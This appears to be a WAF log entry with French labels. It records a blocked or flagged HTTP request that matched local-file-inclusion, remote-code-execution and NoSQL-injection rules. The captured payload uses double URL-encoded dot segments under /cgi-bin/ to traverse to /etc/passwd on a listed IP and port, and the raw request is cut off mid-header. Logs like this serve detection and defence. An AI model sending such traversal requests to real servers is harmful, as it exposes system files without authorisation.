Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-0
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
Requête brute (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1 Host: 62.3.50.33:81 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHT |
|||||||